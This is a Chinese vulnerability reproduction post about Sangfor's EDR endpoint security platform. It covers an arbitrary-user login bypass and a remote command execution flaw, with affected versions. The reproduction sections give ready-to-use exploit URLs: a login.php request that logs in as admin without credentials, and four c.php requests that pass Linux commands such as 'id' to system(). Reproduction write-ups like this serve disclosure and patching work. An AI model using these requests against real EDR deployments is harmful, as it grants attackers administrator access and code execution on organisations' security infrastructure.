深信服EDR任意用户登录与命令执行漏洞
创始人
2024-05-13 15:50:55

深信服EDR任意用户登录与命令执行漏洞

  • 1.深信服EDR简介
  • 2.深信服EDR漏洞
    • 2.1.后台任意用户登录漏洞
      • 2.1.1.漏洞描述
      • 2.1.2.影响版本
      • 2.1.3.漏洞复现
    • 2.2.任意命令执行漏洞
      • 2.2.1.漏洞描述
      • 2.2.2.影响版本
      • 2.2.3.漏洞复现
        • 2.2.3.1.构建URL
        • 2.2.3.2.效果

1.深信服EDR简介

  终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。
  EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。
  端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服的 EDR产品也支持与AC、SIP、AF、SOC、X-central产品的联动协同响应,形成新一代的安全防护体系。

2.深信服EDR漏洞

2.1.后台任意用户登录漏洞

2.1.1.漏洞描述

  攻击者利用该漏洞,登录任意用户。

2.1.2.影响版本

  EDR <= v3.2.19

2.1.3.漏洞复现

构建URL:https://IP地址/ui/login.php?user=admin

  注意后面的admin是必须存在的用户,也就是说EDR设备上必须存在admin的用户,这样才能直接登录admin,若访问的是一个不存在的用户,那么必然无法登录。
在这里插入图片描述

2.2.任意命令执行漏洞

2.2.1.漏洞描述

  攻击者利用该漏洞,可向目标服务器发送恶意构造的HTTP请求,从而获得目标服务器的权限,实现远程代码控制执行。

2.2.2.影响版本

  EDR v3.2.16
  EDR v3.2.17
  EDR v3.2.19

2.2.3.漏洞复现

  注意这里的话,其实有很多的命令是不能用的,而文件上传后,也会存在无法连接的情况,这个还是需要注意一点。

2.2.3.1.构建URL

  这里的url都是构建出来的,后面的id就是命令,根据不同的命令进行执行,注意使用的是Linux命令。

https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&path=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&row=id
https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&limit=id

2.2.3.2.效果

  查询当前路径
在这里插入图片描述

  查看当前目录下文件

在这里插入图片描述

相关内容

热门资讯

猫咪吃了塑料袋怎么办 猫咪误食... 你知道吗?塑料袋放久了会长猫哦!要说猫咪对塑料袋的喜爱程度完完全全可以媲美纸箱家里只要一有塑料袋的响...
demo什么意思 demo版本... 618快到了,各位的小金库大概也在准备开闸放水了吧。没有小金库的,也该向老婆撒娇卖萌服个软了,一切只...
北京的名胜古迹 北京最著名的景... 北京从元代开始,逐渐走上帝国首都的道路,先是成为大辽朝五大首都之一的南京城,随着金灭辽,金代从海陵王...
苗族的传统节日 贵州苗族节日有... 【岜沙苗族芦笙节】岜沙,苗语叫“分送”,距从江县城7.5公里,是世界上最崇拜树木并以树为神的枪手部落...